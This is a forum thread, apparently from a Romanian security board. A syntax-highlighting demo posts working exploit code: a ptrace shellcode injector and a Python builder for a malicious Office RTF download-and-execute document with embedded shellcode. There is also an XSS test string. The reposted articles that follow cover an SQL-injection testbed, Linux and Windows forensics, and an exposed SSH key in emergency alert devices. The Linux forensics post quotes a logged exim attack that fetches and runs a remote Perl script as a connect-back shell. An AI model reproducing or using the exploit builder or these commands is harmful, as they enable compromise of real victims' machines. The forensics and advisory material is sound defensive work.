Nytro

Testat pe Firefox, Chrome, IE si merge ok. Da, ar trebui sa apara colorata, la mine e totul ok. Vezi Tools > Developer > Web console si erorile de JS sau Net. PS: DOAR TEMA RST! Nu merge pe tema Default, deocamdata.

E prima incercare de a pune syntax highlight pe forum. Sper sa fie ok. Deocamdata nu e complet functional: la Edit Post/Quick reply post nu vor aparea colorate, sper sa rezolv asta maine. Cum folositi: [limbaj] COD [/limbaj] Unde limbaj poate fi: - Java - Cpp - Bash - CSharp - CSS - Delphi - Diff - JS - Perl - Plain - Python - SQL - VB - XML Pentru PHP folositi "phpcode", PHP exista deja in vBulletin. Exemplu (fara spatii): [ CPP ]#include "stdio.h" int main() { puts("Syntax highlight!"); return 0; } [ /CPP ] Rezultat: #include "stdio.h"int main() { puts("Syntax highlight!"); return 0; } Exemple reale: CPP: void putcode(unsigned long * dst){ char buf[MAXPATHLEN + CODE_SIZE]; unsigned long * src; int i, len; memcpy(buf, cliphcode, CODE_SIZE); len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1); if (len == -1) fatal("[-] Unable to read /proc/self/exe"); len += CODE_SIZE; buf[len++] = '\0'; src = (unsigned long*) buf; for (i = 0; i < len; i += 4) if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1) fatal("[-] Unable to write shellcode"); } Python: import binasciiimport sys import time print "Microsoft Office 2010, download -N- execute " print " What do you want to name your .doc ? " print " Example: TotallyTrusted.doc " filename = raw_input() print " What is the link to your .exe ? " print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe " url = raw_input() print "Gears and Cranks working mag1c in the background " time.sleep(3) close="{}}}}}" binme=binascii.b2a_hex(url) file=('e1xydGYxbnNpbnNpY3BnMTI1MlxkZWZmMFxkZWZsYW5nMTAzM3sNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb250dGJsew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgMA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN3aXNzDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGFyc2V0MCBBcmlhbDt9fXtcKlxnZW5lcmF0b3IgTXNmdGVkaXQgNS40MS4xNS4xNTA3O30NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlld2tpbmQ0XHVjMVxwYXJkDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHMyMCBwYXJkXGYwXGZzXHBhci90YWJccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhclxwYXJ7XHNocHtcc3B9fXtcc2hwe1xzcH19e1xzaHB7XHNwfX17XHNocHtcKlxzaHBpbnN0XHNocGZoZHIwXHNocGJ4Y29sdW1uXHNocGJ5cGFyYVxzaCBwd3IyfXtcc3B7XHNue317fXtcc259e1xzbn17XCpcKn1wRnJhZ21lbnRzfXtcKlwqXCp9e1wqXCpcc3Z7XCp9OTsyO2ZmZmZmZmZmZmYjMDUwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwZTBiOTJjM2ZBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBNWMxMTEwM2ZhNTljMzgzZmNmYWYzOTNmMTAwMTA0MDEwMTAxMDEwMTAxMDEwMTAxZTBiOTJjM2YwMDgwMDAwMDQ2Y2IzOTNmZGVhZGJlZWZlMGI5MmMzZmMwM2QzYjNmY2MzMzIyM2ZkZjU5MmQzZmM0M2QzYjNmY2MxODJmM2ZjNDNkM2IzZjVlNzQyYjNmNWU3OTM5M2YyNDAwMDAwMDQ0Y2IzOTNmc2x1dGZ1Y2s2NzgyMzkzZmRlMTYzYTNmNjc4MjM5M2ZlMGI5MmMzZmMwM2QzYjNmYTU5YzM4M2Y3YzBhMmIzZmUwYjkyYzNmNTU2Njc3ODhjMDNkM2IzZmE1OWMzODNmZmJiZTM4M2ZlMGI5MmMzZjgwMDAwMDAwYjQ0MTM0M2Y1NTU1NTU1NTY2NjY2NjY2Y2ZhZjM5M2Y0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxZWI3NzMxYzk2NDhiNzEzMDhiNzYwYzhiNzYxYzhiNWUwODhiN2UyMDhiMzY2NjM5NGYxODc1ZjJjMzYwOGI2YzI0MjQ4YjQ1M2M4YjU0MDU3ODAxZWE4YjRhMTg4YjVhMjAwMWViZTMzNDQ5OGIzNDhiMDFlZTMxZmYzMWMwZmNhYzg0YzA3NDA3YzFjZjBkMDFjN2ViZjQzYjdjMjQyODc1ZTE4YjVhMjQwMWViNjY4YjBjNGI4YjVhMWMwMWViOGIwNDhiMDFlODg5NDQyNDFjNjFjM2U4OTJmZmZmZmY1ZjgxZWY5OGZmZmZmZmViMDVlOGVkZmZmZmZmNjg4ZTRlMGVlYzUzZTg5NGZmZmZmZjMxYzk2NmI5NmY2ZTUxNjg3NTcyNmM2ZDU0ZmZkMDY4MzYxYTJmNzA1MGU4N2FmZmZmZmYzMWM5NTE1MThkMzc4MWM2ZWVmZmZmZmY4ZDU2MGM1MjU3NTFmZmQwNjg5OGZlOGEwZTUzZTg1YmZmZmZmZjQxNTE1NmZmZDA2ODdlZDhlMjczNTNlODRiZmZmZmZmZmZkMDYzNmQ2NDJlNjU3ODY1MjAyZjYzMjAyMDYxMmU2NTc4NjUwMA==\n') textfile = open(filename , 'w') textfile.write(file.decode('base64')+binme+close) textfile.close() time.sleep(3) print "enjoy" E posibil sa fie si alte probleme, verificati daca este totul in regula si postati aici daca e vreo problema.

Da, l-am vazut, this is the real shit!

SQLol Released at Austin Hackers Association meeting 0x3f Daniel Crowley <dcrowley@trustwave.com> http://www.trustwave.com INTRODUCTION ============ ***WARNING: SQLol IS INTENTIONALLY VULNERABLE. DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT EXPOSE SQLol IN AN UNTRUSTED ENVIRONMENT.*** SQLol is a configurable SQL injection testbed. SQLol allows you to exploit SQL injection flaws, but furthermore allows a large amount of control over the manifestation of the flaw. To better understand why SQLol exists, please read the sonnet below: I humbly posit that the current state (With much respect to work which does precede) Of test-beds made with vulns to demonstrate Is lacking some in flexibility. Two options are presented present-day, As far as when one deals with S-Q-L: A blind injection (bool or time delay) And UNION statement hax (oh gee, how swell…) Imagine we could choose how queries read And how our input sanitizes, oh! How nimble and specific we could be To recreate our ‘sploit scenarios. And thus is S-Q-L-O-L conceived: That we can study how to pwn DBs. Options: Type of query Location within query Type and level of sanitization Level of query output Verbosity of error messages Visibility of query Injection string entry point Other cool things: Reset button Challenges Support for multiple database systems REQUIREMENTS ============ PHP 5.x Web server Database server (MySQL, PostgreSQL and SQLite have been tested, others may work) ADODB library (included) USAGE ===== Place the SQLol source files on your Web server and open in a Web browser. Modify the configuration file #sqlol_directory#/includes/database.config.php to point to your installed database server. Use the resetbutton.php script to write the SQLol database, then start playing! COPYRIGHT ========= SQLol - A configurable SQL injection testbed Daniel "unicornFurnace" Crowley Copyright © 2012 Trustwave Holdings, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/> Download: https://github.com/SpiderLabs/SQLol

Da, e smecher

', null, 123, null); alert('Pufuleti');

Test " < > ' plm \ / ()

In limita timpului disponibil...: 1. Two-factor auth 2. Validare certificat self-signed

Prea complex, ma interesa doar algoritmul NTLM.

Getting Started with Linux Memory Forensics Posted by Chad Tilbury Filed under Linux IR, Memory Analysis, Volatility Like many of you, I have been watching the development of memory forensics over the last two years with a sense of awe. It is amazing how far the field has come since the day Chris Betz, George Garner and Robert-Jan Moral won the 2005 DFRWS forensics challenge. Of course, similar to other forensic niches, the majority of progress has been made on Windows memory forensics. There is good reason for this. Memory can be extremely fickle, with layouts and structures changing on a whim. As an example, the symbols file for Windows 7 SP1x86 is 330MB, largely due to it needing to support major changes that can occur in every service pack and patch. The fact that we have free tools such as Volatile Systems Volatilityand Mandiant Redlinesupporting memory images of arbitrary size from (nearly) every modern version of Windows is nothing short of miraculous. Nowhere is it more obvious how far the memory analysis field has come than looking at the recent innovations in Mac and Linux memory forensics. Examiners of these less popular platforms have had to sit patiently for years as Windows memory forensics moved from being feasible for OS internals experts to being approachable for the masses. Against all odds, Linux memory analysis has recently seen rapid innovations. If support for the various Windows versions came slowly, imagine the complexity posed by the myriad flavors of Linux and the long list of possible kernel versions. It turns out that the Volatility framework is particularly well suited to tackle this Hydra with its abstraction layers facilitating everything from different image formats to swappable OS profiles to rapid plugin development. Getting Started — SVN Checkout I recommend upgrading to (at least) version 2.3 of Volatility when getting familiar with Linux memory. The 2.3 plugins are still in beta, but there have been some significant improvements that greatly facilitate analysis. Adding the latest version is easy via subversion checkout. For instance, in the SANS SIFT workstation, you can run the following commands: mkdir /usr/local/src/vol2.3-devsvn checkout http://volatility.googlecode.com/svn/branches/2.3-devel /usr/local/src/vol2.3-dev/ ln -s /usr/local/src/vol2.3-dev/vol.py /usr/local/bin/voldev.py voldev.py --info Creating a profile The only significant hurdle to performing Linux memory analysis in Volatility is the requirement to create a bespoke profile for the flavor of Linux with which you are working. Creating a profile is surprisingly easy -- a great testament to the flexibility of the framework. If you work in a pseudo-homogeneous environment you may only need to pre-build a few profiles to cover the systems you are likely to encounter. If you don't have the luxury of pre-building profiles, the steps can easily be scripted and included in your incident response scripts (runaftermemory acquisition and substituting the Subversion checkout of Volatility with just the files necessary to run the "make" command).The Volatility wiki does an excellent job of describing the profile creation process, and the default Volatility SVN checkout contains the tools you need. In my case, I was interested in working with an older version of Debian because I wanted to redo Challenge 7 of the Honeynet Project Forensic Challenge 2011. While 2011 isn't that long ago, it might as well be ancient times for fast moving Linux distributions. Getting a running copy of the Debian 5 (Lenny) distribution took a few extra steps than would ordinarilyhave been required of a more modern distribution. Here was my process: Download the correct distribution being mindful of kernel version and architecture Run "uname -a" or read the dmesg log on a live system. If you only have a memory image, strings can identify the correct distribution and kernel version. The system type for the Honeynet challenge was Debian 5 2.6.26 kernel x86 Install the distribution into a virtual machine (VM) Due to the age of the distribution, the default update mirrors were no longer supported. This required modifying /etc/apt/sources.list to point to the archive servers at Index of / The repository misalignment resulted in a very minimal Linux install. With apt now pointing to the correct archive, I ran apt-get update and apt-get install debian-archive-keyringto include some of the basic packages Watch for attempts by the distribution to auto-upgrade (and do not run apt-get upgrade) Install Subversion in the VM and download Volatility apt-get install subversion-tools svn checkout volatility - Revision 3452: /trunk /usr/local/src/volatility/ Create the kernel data structures file using dwarfdump My minimal installation required several additional packages: apt-get install make apt-get install linux-headers-$(uname -r) apt-get install dwarfdump [*]./usr/local/src/volatility/tools/linux/make Locate the kernel symbol file In this case the full path was /boot/System.map-2.6.26-2-686 Zip up your results and move to your forensic workstationThe final result should be a module.dwarf file and a "System.map" symbol file located within a zip archive. This zip archive must be copied to the overlays/linux folder within the Volatility distribution you intend to use. The --info command will display all recognized profiles. Starting the Analysis I found the 2011 Honeynet Challenge interesting because the winner, Dev Anand, and several others successfully used early versions of Linux memory analysis to help solve it. I was interested in gauging how far the state of the art had progressed since then. Simply put, the Volatility project has truly taken Linux analysis to the next level, with 40 plugins in version 2.3 providing vast capabilities that simply did not previously exist. Many of the questions that previously required access to the system disk can now be answered just as easily from the memory image. I'll use the challenge to demonstrate some of the plugins.linux_netstat Processes and network connections are the first things I review when starting analysis of a new memory image. In this case the linux_netstat plugin identifies two interesting established connections to IP address 192.168.56.1 using ports 4444 and 8888. The connections are tied to processes named "sh" and "nc". Further, we see a couple of interesting listening daemons: sshd on port 22 and exim4 on port 25. linux_psaux The linux_psaux plugin augments the standard process listing with command line information. While not terribly helpful here, the output does tend to reinforce that "nc" may in fact be a netcat binary. NOTE: You only need to set the VOLATILITY_PROFILE environment variable once, but it is included in each of the examples as a reminder that the demonstrated plugins require a Linux profile variable set or included via the --profile parameter. linux_yarascan The Volatility yarascan plugins for Windows, Mac, and now Linux leverage open-source yara signatures to provide a simple and powerful means to search user and kernel memory. In this example I was simply looking for the suspicious IP address string from the linux_netstat command, but keep in mind that an entire rules file could have been used. The first hit (found within process rsyslogd) could be a partial log entry related to a SSH login, which should be possible to verify within the /var/log/auth.log. This log could be found and exported using the linux_find_file Volatility plugin, but, in this case, it does not appear to be resident in memory. A review of the auth.log on disk shows several related failed logins from 192.168.56.1 via SSH: Feb 6 15:20:54 victoria sshd[2157]: Failed none for invalid user ulysses from192.168.56.1 port 44616 ssh2 The second and third yarascan hits displayed look like commands or related output. Since the hits were found in the bash process (PID 2042), the bash command line history would be worth reviewing.linux_bash The linux_bash plugin is a particularly impressive plugin as it carves out individual bash history entries and reassembles them for analysis. If bash history exists, it can provide a very in-depth view into user activity. In this case we see a lot of strange activity surrounding the exim server as well as attempts to copy the entire sda drive, sda1 partition and memory over to the suspicious IP addresses. A challenge in this investigation would be differentiating legitimate system administration actions from hacker activity. Given the manipulations surrounding exim, a logical next step might be to review the exim logs in /var/log/exim4. The /var/log/exim4/mainlog recorded several errors referencing the previously discovered suspicious IP address and ports as well as multiple wget attempts to download files into the /tmp folder: 2011-02-06 15:08:13 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL <root@local.com>: failed to expand ACL string "pl 192.168.56.1 4444; sleep 1000000'"}} ${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000'"}} ... linux_dentry_cache To improve file system performance, Linux caches directory entries and inode information as files are opened. The linux_dentry_cache Volatility plugin returns the contents of the directory entry cache, giving examiners a detailed view of the most recently referenced files in the file system. In this case, I used the plugin in an attempt to identify whether the attacker succeeded in downloading tools to the /tmp directory. It appears that the attacker was eventually successful in retrieving the c.pl file. Further, the rk.tar archive looks interesting and should be analyzed. Conclusion Linux memory forensics has definitely come of age, and I highly recommend including it in your incident response process. Volatility makes it easy to get started. You can find the memory image demonstrated here at the Honeynet Projectand download the Debian profile created for this post here. When you are done working with that image, Raytheon SecondLook provides a large selection of both clean and infected memory images. Finally, as you create new Linux profiles, please consider donating them back to the Volatility Linux profiles page. Sursa: Getting Started with Linux Memory Forensics

Root SSH Key Shipping with Emergency Alert System Devices Exposed by Michael Mimoso Firmware images for the application servers that distribute messages for the Emergency Alert System in the United States are shipping with a private root SSH key that has been disclosed. Hackers who have this key can access one of these servers and interrupt or manipulate an EAS message. The EAS is a system that enables, in a worst-case scenario, the president to speak to the nation within 10 minutes of a disaster over radio and television. In February, ENDEC machines at a Montana television station were accessed by hackers and broadcast a phony emergency alert warning of a zombie apocalypse. DHS’ ICS-CERT issued an alert last week warning that Digital Alert Systems’ DASDEC and Monroe Electronics One-Net E189 EAS devices were shipping a compromised shared private root SSH key in publicly available firmware images. The vulnerabilities in the DASDEC application serversmwere reported by IOActive principal research scientist Mike Davis. The servers authenticate EAS messages and interrupt broadcasts with the familiar alert tone that accompanies emergency messages. “These DASDEC application servers are currently shipped with their root privileged SSH key as part of the firmware update package. This key allows an attacker to remotely log on in over the Internet and can manipulate any system function,” Davis said in a statement. “For example, they could disrupt a station’s ability to transmit and could disseminate false emergency information. For any of these issues to be resolved, we believe that re-engineering needs to be done on the digital alerting system side and firmware updates to be pushed to all appliances.” The compromised SSH keys ship in the firmware images for the Linux-based DASDEC-I and DASDEC-II appliances. An attacker can use the key to log in over the Internet and impact emergency messages delivered to an undetermined number of locations and stations. Depending on the device configuration, IOActive said, manipulated messages could be sent to other DASDEC systems. According to an IOActive advisory, the publicly available SSH key can be removed only by a root privileged user on the server. An attacker with access can also view the server logs, which includes machine information, administrator data and other sensitive data. In addition, DHS CERT said the administrative Web server generates predictable session ID passwords that could also allow an attacker to own an admin dashboard. The DASDEC and One-Net ENDEC machines also ship with default administrative credentials that some sites neglect to change. As far as mitigations go, Monroe Electronics and Digital Alert Systems updated their firmware in April disabling the compromised SSH key. There are also simplified means of installing new unique keys and a new password policy. Until a new image is obtained and installed, users are urged to disable the compromised root SSH key immediately, especially if it is Web-enabled. DHS CERT said that if users are unable to replace the SSH root key, they should restrict access to trusted hosts and networks, and change all default passwords. Sursa: EAS Devices Shipping with Compromised Root SSH Key | Threatpost

[h=3]HowTo: Determine Program Execution[/h] Sometimes during an examination, it can be important to determine what programs have been executed on a system, and more specifically, when and by which user. Some of the artifacts on a system will provide us with indications of programs that have been executed, while others will provide information about which user launched the program, and when. As such, some of this information can be included in a timeline. Hopefully, something that will become evident throughout this post, as well as other HowTo posts, is that rather than focusing on individual artifacts, we're going to start putting various artifacts into "buckets" or categories. The purpose for doing this is so that analysts don't get lost in a sea of artifacts, and are instead able to tailor their initial approach to an examination, possibly using an analysis matrix. Okay, let's get started... AutoStart Locations Before we begin to look at the different artifacts that can be directly tied to a user (or not), I wanted to briefly discuss autostart locations. These are locations within the system...file system, Registry...where references to programs can reside that allow programs to be executed automatically, without any interaction from the user beyond booting the system or logging in. There are a number of such locations and techniques that can be used...Registry autostart locations, including the ubiquitous Run key, Windows services, the StartUp folder on the user's Program Menu, and even the use of the DLL Search Order functionality/vulnerability. Each of these can be (and have been) discussed in multiple blog posts, so for now, I'm simply going to present them here, under this "umbrella" heading, for completeness. Scheduled Tasks can be, and are, used as an autostart location. Many of us may have QuickTime or iTunes installed on our system; during installation, a Scheduled Task to check for software updates is created, and we see the results of this task now and again. Further, on Windows 7 systems, a Scheduled Task creates backups of the Software, System, Security, and SAM hive files into the C:\Windows\system32\config\RegBack folder every 10 days. When considering autostart locations, be sure to check the Scheduled Tasks folder. Tip On a live system, you need to use both the schtasks.exe and at.exe commands to get a complete listing of all of the available Scheduled Tasks. Tools: RegRipper plugins, MS/SysInternals AutoRuns; for XP/2003 Scheduled Task *.job files, jobparse.pl; on Vista+ systems, the files are XML User There are a number of artifacts within the user context that can indicate program execution. This can be very useful, as it allows analysts to correlate program execution to the user context in which the program was executed. UserAssist The contents of value data within a user's UserAssist subkeys can provide an excellent view into what programs the user has launched via the Explorer shell...by double-clicking icons or shortcuts, as well as by navigating via the Program Menu. Most analysts are aware that the value names are Rot-13 encoded (and hence, easily decoded), and folks like Didier Stevens have gone to great lengths to document the changes in what information is maintained within the value data, as versions of the operating systems have progressed from Windows 2000 to Windows 8. Tools: RegRipper userassist.pl and userassist_tln.pl plugins RunMRU When a user clicks on the Start button on their Windows XP desktop, and then types a command into the Run box that appears, that command is added to the RunMRU key. Interestingly, I have not found this key to be populated on Windows 7 systems, even though the key does exist. For example, I continually use the Run box to launch tools such as RegEdit and the calculator, but when I dump the hive file and run the runmru.pl RegRipper plugin against it, I don't see any entries. I have found the same to be true for other hives retrieved from Windows 7 systems. Tools: RegRipper runmru.pl plugin ComDlg32\CIDSizeMRU Values The binary values located beneath this key appear to contain names of applications that the user recently launched. From my experience, the majority of the content of these values, following the name of the executable file, is largely zeros, with some remnant data (possibly window position/size settings?) at the end of the file. As one of the values is named MRUListEx, we can not only see (via a timeline) when the most recent application was launched, but we can also see when other applications were launched by examining available VSCs. AppCompatFlags According to MS, the Program Compatibility Assistant is used to determine if a program needs to be run in XP Compatibility Mode. Further, "PCA stores a list of programs for which it came up...even if no compatibility modes were applied", under the Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted key in the user's NTUSER.DAT hive. As such, we can query these values and retrieve a list of programs run by the user. Tools: RegRipper appcompatflags.pl plugin (I updated the plugin, originally written by Brendan Cole, to include retrieving the values beneath the Persisted key, on 6 July 2013; as such, the plugin will be included in the next rollout) MUICache The contents of this key within the user hives (NTUSER.DAT for XP/2003, USRCLASS.DAT for Win7) often contains references to applications that were launched within the user context. Often times, these application will include command line interface (CLI) utilities. Windows shortcuts/LNK files and Jump Lists You're probably thinking..."huh?" Most analysts are familiar with how shortcuts/LNK files (and Jump Lists) can be used to demonstrate access to files or external storage devices, but they can also be used to demonstrate program execution within the context of a user. Most of us are familiar with the LNK files found in the ..\Windows\Recent and ..\Office\Recent folders within the user profile...so, think about how those shortcuts are created. What usually happens is that the user double-clicks a file, the OS will read the file extension from the file, and then query the Registry to determine which application to launch in order to open the file. Windows will then launch the application...and this is where we have program execution. Many times when a user installs an application on their system, a desktop shortcut may be created so that the user can easily launch the application. The presence of the desktops icon may indicate that the user launched an installer application, and Tools: custom Perl script, tools to parse LNK files Java Deployment Cache Index (*.idx) Files The beginning of 2013 saw a lot of discussion about vulnerabilities to Java, as well as reports of 0-days, and as a result, there was a small number of folks within the community looking into the use of Java deployment cache index (*.idx) files during analysis. The use of these files as artifacts during an investigation goes back to well before then, thanks to Corey Harrell. These files provide indications of downloads to the system via Java, and in some cases, those downloads might be malicious in nature. These artifacts are related specifically to Java being executed, and may lead to indications of additional programs being executed. Further, given that the path to the files is within the user profile folder, we can associate the launch of Java with a specific user context. Tools: idxparse.pl parser Browser History A user's browser history not only indicates that they were browsing the web (i.e., executing the browser program), but the history can also be correlated to the *.idx files discussed above in order to determine which site they were visiting that caused Java to be launched. System There are a number of artifacts on the system that can provide indications of program execution Prefetch File Analysis Most analysts are aware of some of the metadata found within Prefetch files. Application prefetch files include metadata indicating when the application was last launched, as well as how many times it has been launched. This can provide some excellent information Tools: pref.pl, or any other tools/scripts that parse the embedded module strings. Recent versions of scripts I've written and use incorporate an alerting mechanism to identify items within the strings and string paths found to be "suspicious" or "unusual". AppCompatCache This value within the System hive in the Registry was first discussed publicly by Mandiant, and has proven to be a treasure trove of information, particularly when it comes to malware detection and determining program execution, in general. Tools: Mandiant's shim cache parser, RegRipper appcompatcache.pl plugin (appcompatcache_tln.pl plugin outputs in TLN format, for inclusion in timelines). Legacy_* Keys Within the System hive, most of use are familiar with the Windows services keys. What you may not realize is that there is another set of keys that can be very valuable when it comes to understanding when Windows services were run...the Enum\Root\Legacy_* keys. Beneath the ControlSet00n\Enum\Root key in the System hive, there are a number of subkeys whose names being with LEGACY_, and include the names of services. There are a number of variants of malware (Win32/Alman.NAD, for example) that install as a service, or driver, and when launched, the operating system will create the Enum\Root\Legacy_* key for the service/driver. Also, these keys persist after the service or driver is no longer used, or even removed from the system. Malware writeups by AV vendors will indicate that the keys are created when the malware is run (in a sandbox), but it is more correct to say that the OS creates the key(s) automatically as a result of the execution of the malware. This can be an important distinction, which is better addressed in another blog post. Tools: RegRipper legacy.pl plugin Direct* and Tracing Keys These keys within the Software hive can provide information regarding program execution. The "Direct*" keys are found beneath the Microsoft key, and are keys whose names start with "Direct", such as Direct3D, DirectDraw, etc. Beneath each of these keys, you may find a MostRecentApplication key, which contains a value named Name, the data of which indicates an application that used the particular graphics functionality. Many times during an exam, I'll see "iexplore.exe" listed in the data, but during one particular exam, I found "DVDMaker.exe" listed beneath the DirectDraw key. In another case, I found "mmc.exe" listed beneath the same key. I've found during exams that the Microsoft\Tracing key contains references to some applications that appear to have networking capabilities. I do not have any references to provide information as to which applications are subject to tracing and appear beneath this key, but I have found references to interesting applications that were installed on systems, such as Juniper and Kiwi Syslog tools (during incident response engagements, this can be very helpful and allow you collect Event Logs from the system that have since been overwritten, and included in a timeline...). Unfortunately, these artifacts have nothing more than the EXE name (no path or other information is included or available), but adding the information to a timeline can provide a bit of context and granularity for analysis. Tip When examining these and other keys, do not forget to check the corresponding key beneath the Wow6432Node key within the Software hive. The RegRipper plugins address this automatically. Tools: RegRipper direct.pl and tracing.pl plugins Event Logs Service Control Manager events within the System Event Log, particularly those with event IDs 7035 and 7036, provide indications of services that were successfully sent controls, for either starting or stopping the service. Most often within the System Event Log, you'll see these types of events clustered around a system start or shutdown. During DFIR analysis, you're likely going to be interested in either oddly named services, services that only appear recently, or services that are started well after a boot or system startup. Also, you may want to pay close attention to services such as "PSExeSvc", "XCmdSvc", "RCmdSvc", and "AtSvc", as they may indicate lateral movement within the infrastructure. On Windows 2008 R2 systems, I've found indications of program execution in the Application Experience Event Logs; specifically, I was examining a system that had been compromised via an easily-guessed Terminal Services password, and one of the intruders had installed Havij (and other tools) on the system. The Application-Experience/Program-Inventory Event Log contained a number of events associated with program installation (event IDs 903 and 904), application updates (event ID 905), and application removal (event IDs 907 and 908). While this doesn't provide a direct indication of a program executing, it does illustrate that the program was installed, and that an installer of some kind was run. On my own Windows 7 system, I can open the Event Viewer, navigate to the Event Log, and view the records that illustrate when I have installed various programs knowingly (FTK Imager) and unknowningly (Google+ Chat). There are even a number of application updates to things like my ActiveState Perl and Python installations. Tools: LogParser, evtxparse.pl Other Indirect Artifacts Many times, we may be able to determine program execution through the use of indirect artifacts, particularly those that persist well after the application has finished executing, or even been deleted. Many of the artifacts that we've discussed are, in fact, indirect artifacts, but there may still be others available, depending upon the program that was executed. A number of years ago, I was...and I don't like to admit this...certified to perform PCI forensic audits. On one case, I ran into my first instance of a RAM scraper...this was a bit of malware that was installed on a point-of-sale (POS) back office server (running Windows) as a Windows service. After the system was booted, this instance of the malware would read the contents of a register, do some math, and use that value as a seed to wait a random amount of time before waking up and dumping the virtual memory from one of eight named (the names were listed in the executable file) processes. The next step was to parse the memory dump for track data, and this was accomplished via the use of Perl script that was "compiled" via Perl2Exe. I'm somewhat familiar with such executables, and one of the artifacts we found to validate our findings with respect to the actual execution of the malicious code was temporary directories created by "compiled" script. When executables "compiled" with Perl2Exe are run, any of the Perl modules (including the runtime) packed into the executable are extracted as DLLs into a temporary directory, at which time they are "available" to the running code. As the code was launched by a Windows service, the "temp" directories were found in the C:\Windows\Temp folder. The interesting thing that we found was that the temp directories used to hold the modules/DLLs are not deleted after the code completes, and they persist even if the program itself is removed from the system. In short, we had a pretty good timeline for each time the parsing code was launched. On my own Windows 7 system, because I run a number of Perl scripts that were "compiled" with Perl2Exe within the context of my user account, the temp directories are found in the path, C:\Users\harlan\AppData\Local\Temp...the subdirectories themselves are named "p2xtmp-", and are followed by an integer, and themselves contain subdirectories that represent the Perl runtime namespace. The time stamps (creation dates) for these subdirectories provide indications of when I executed scripts that had been compiled via Perl2Exe. Memory Dumps During dead box analysis, memory dumps can be an excellent source of information. When an application crashes, a memory dump is created, and a log file containing information including a process list also created. When another application crash occurs, the memory dump is overwritten, but the log file is appended to, meaning that you can have a number of crash events available for analysis. I have found this historical information to be very useful during examinations because, while the information is somewhat limited, it can illustrate whether or not a program was running at some point in the past. We're not going to discuss hibernation files here, as once you access a hibernation file and begin analysis, there really is very little difference between analyzing the hibernation file and analyzing a memory dump for a live system. Many of the techniques that you'd use, and the artifacts that you would look for, are pretty much the same. Tools: text viewer Malware Detection Another use of this artifact category is that it can be extremely valuable in detecting the presence of malware on a system. However, malware detection is a topic that is best addressed in another post, as there is simply too much information to limit the topic to just a portion of a blog post. Resources This idea of determining program execution has been discussed before: Timeline Analysis, and Program Execution There Are Four Lights: Program Execution Posted by Keydet89 Sursa: Windows Incident Response: HowTo: Determine Program Execution

